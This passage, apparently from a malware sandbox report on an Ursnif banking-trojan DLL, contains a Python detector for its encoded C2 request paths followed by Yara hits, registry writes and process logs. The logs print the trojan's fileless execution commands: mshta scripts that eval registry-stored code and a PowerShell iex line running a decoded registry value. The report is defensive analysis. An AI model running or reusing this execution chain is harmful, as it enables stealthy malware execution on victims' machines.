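    """Undo the URI transform: drop the leading directory and the fake
    extension, join the segments, map _2F/_2B back to '/' and '+'."""
    segs = path_segments(path)
    if len(segs) < 3:
        return None
    segs = segs[1:]                       # leading directory is a fixed decoy
    segs[-1] = EXT_RE.sub("", segs[-1])   # strip ".crw" or similar
    return "".join(segs).replace("_2F", "/").replace("_2B", "+")


def decode_path(path: str) -> Optional[bytes]:
    """Base64-decode the re-assembled path; None if it is not base64 at all."""
    b64 = reassemble(path)
    if b64 is None or not B64_RE.match(b64) or len(b64) % 4 == 1:
        return None
    return base64.b64decode(b64 + "=" * (-len(b64) % 4))


def triage(host: str, path: str, user_agent: str) -> dict:
    """Score one request; two or more indicators flag it."""
    reasons = []
    segs = path_segments(path)
    if ESCAPE_RE.search(path):
        reasons.append("_2F/_2B escape tokens in path")
    blob = decode_path(path)
    if blob is not None and len(blob) >= 32 and len(blob) % 16 == 0:
        reasons.append(f"path re-assembles to {len(blob)} bytes of base64 (16-byte block multiple)")
    if len(segs) >= 5 and all(SEGMENT_RE.match(s) for s in segs[:-1]):
        reasons.append(f"{len(segs)}-deep path of random alphanumeric segments")
    if user_agent == LEGACY_UA:
        reasons.append("hard-coded MSIE 8.0 on Windows NT 10.0 User-Agent")
    return {"host": host, "flagged": len(reasons) >= 2, "reasons": reasons,
            "decoded_len": None if blob is None else len(blob)}


# (host, path, User-Agent) transcribed from the report's HTTP request lines.
SAMPLE_REQUESTS = [
    ("aaaa.bar",
     "/jdraw/v6MBuMp_2/FbQ1ciPPyCG2FcgWXCEw/4p6JWEqOHqaqqmtUZlW/iZ4hp74waYQa3SoGGuOho1"
     "/ovuxQrp7KsWgS/wBggvPBS/iWInt5CFnJyvSqpyHgJyYxn/O_2F_2BUYe/fLDTk5RpDf_2F9mZ_"
     "/2F7NAIxeGgZa/QcsaY21TZZx/U7QIv9qlBRWqpg/DR61HU_2FzqgxKP2wonEs/EkSZK.crw",
     LEGACY_UA),
    ("aaaa.bar",
     "/jdraw/5EykzOMH8AC5xhH2f/h8YTRIF2mRSj/KI86vZ_2Fir/d_2FuekCCAOUjf/zFWcX3e13Ac_2BX_2BJGA"
     "/HUhc5yQiyPXedVM9/FyaB9AafT7f6pn1/rx17UyN0GmK2igoXTb/2p_2Bsvx3/fo8we1bgw6ZsfyAC6K72"
     "/DEX9YIVMXwvcSkZsNZR/8w9U8utAyGo407eExfiyfi/bLDkUZuz9hmdJ/XGInYyFxli4cy/JoKC.crw",
     LEGACY_UA),
    ("aaaa.bar",
     "/jdraw/34E0B5g64GhF/3XPDxs0lbMy/bqW9ARMnbt0tkT/D8MYNhHmIu3qZwQWjO72P/RY9TfewXOKIHe_2B"
     "/ce4ORl02hRz9Esp/_2BVvpIh9LurZ83S_2/B0O2_2FdR/gIrNQT1mMUiZ_2BS_2BT/MDTnU5RczKhEBmBWqGJ"
     "/EyrDp1_2FuqKMBIze3vzAt/t9EP4e8z_2FDf/kKFLZbmvwAVEbK/QjYP.crw",
     LEGACY_UA),
    ("geolocation.onetrust.com", "/cookieconsentpub/v1/geo/location", IE11_UA),
    ("ad.doubleclick.net", "/favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250", IE11_UA),
    ("img.img-taboola.com",
     "/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen"
     "/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5b179a030c29a1ac065fdc22323514dd.png",
     IE11_UA),
]

if __name__ == "__main__":
    for host, path, ua in SAMPLE_REQUESTS:
        r = triage(host, path, ua)
        print(f"{host:26} flagged={r['flagged']!s:5} decoded={r['decoded_len']} {r['reasons']}")
```

On the first aaaa.bar request the path re-assembles to 192 base64 characters and decodes to 144 bytes, a whole number of 16-byte blocks, which is what a block-cipher-encrypted request body looks like; the browser traffic never survives the alphabet check because of its %-escapes and dots. The leading-directory name and the extension vary between Ursnif builds, so the check keys on the escape tokens and the block alignment rather than on "jdraw" or ".crw".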

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000009.00000003.668818796.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669066527.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.760454651.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.720146282.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.725551694.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669002058.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668792468.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696203622.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.668767287.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696328482.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682552775.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.729873849.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.751457455.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682707764.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682497297.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668983889.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682925882.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668839332.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.728388991.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682449280.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.729934950.0000000004EDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669342603.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.726873336.0000000003A3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668597805.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696428988.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696293646.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.737533634.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668893514.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668698618.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.762064879.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696353839.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696234648.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696265985.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696490210.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.761914135.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682640820.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682808858.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.683000420.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.668889642.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.731054718.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669161190.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.739495874.00000000058CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668637384.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669217152.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.739276832.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668670422.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.719599695.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 2908, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4892, type: MEMORYSTR
Source: Yara match File source: 6.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.f30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.37194a0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.37194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.509157681.0000000002A90000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.796706497.0000000000F30000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.563086752.00000000030D0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.804704031.0000000003719000.00000004.00000040.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: loaddll32.exe, 00000000.00000002.798415172.000000000116B000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Note: the matched string names DirectDrawCreateEx in DDRAW.DLL, a DirectDraw (graphics) entry point rather than a DirectInput one, so on its own this signature is weak evidence of keylogging; the Yara matches above carry the verdict.

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: same memory dumps, process memory spaces and unpacked PE files as listed under "Yara detected Ursnif" in the Key, Mouse, Clipboard, Microphone and Screen Capturing section above
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4892, type: MEMORYSTR
Source: Yara match File source: 6.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.f30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.37194a0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.37194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.509157681.0000000002A90000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.796706497.0000000000F30000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.563086752.00000000030D0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.804704031.0000000003719000.00000004.00000040.sdmp, type: MEMORY

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Uses 32bit PE files
Source: gECym.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100021B4 0_2_100021B4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F00B67 0_2_00F00B67
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F00B69 0_2_00F00B69
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001540 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_10001540
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100023D5 NtQueryVirtualMemory, 0_2_100023D5
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
PE / OLE file has an invalid certificate
Source: gECym.dll Static PE information: invalid certificate
Source: gECym.dll Virustotal: Detection: 10%
Source: gECym.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\gECym.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\gECym.dll
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gECym.dll,DllUnregisterServer
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2376 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gECym.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gECym.dll,DllGetClassObject
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Kf7p='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kf7p).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Acbs='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acbs).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn))
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ns0e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ns0e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\gECym.dll
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gECym.dll,DllUnregisterServer
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gECym.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gECym.dll,DllGetClassObject
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2376 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\InProcServer32
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{3F2CDD13-31F2-11EC-90E5-ECF4BB570DC9}.dat
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF062D96AA82264A2D.TMP
Source: classification engine Classification label: mal100.troj.evad.winDLL@26/19@24/7
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts

Data Obfuscation:

Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn))
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100021A3 push ecx; ret 0_2_100021B3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10002150 push ecx; ret 0_2_10002159
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F008B1 push dword ptr [esp+0Ch]; ret 0_2_00F008C5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F008B1 push dword ptr [esp+10h]; ret 0_2_00F0090B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F003B4 push dword ptr [ebp-00000284h]; ret 0_2_00F00423
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F00576 push dword ptr [ebp-00000284h]; ret 0_2_00F00724
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F00576 push dword ptr [ebp-0000028Ch]; ret 0_2_00F00778
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F00576 push edx; ret 0_2_00F007C6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F00576 push dword ptr [esp+10h]; ret 0_2_00F008B0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F00779 push edx; ret 0_2_00F007C6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F0053F push dword ptr [ebp-00000284h]; ret 0_2_00F00575
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F00725 push edx; ret 0_2_00F007C6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F00382 push dword ptr [ebp-00000284h]; ret 0_2_00F0053E
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001753 LoadLibraryA,GetProcAddress, 0_2_10001753
PE file contains an invalid checksum
Source: gECym.dll Static PE information: real checksum: 0x4a07a should be: 0x4445d
Registers a DLL
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\gECym.dll

Hooking and other Techniques for Hiding and Protection:

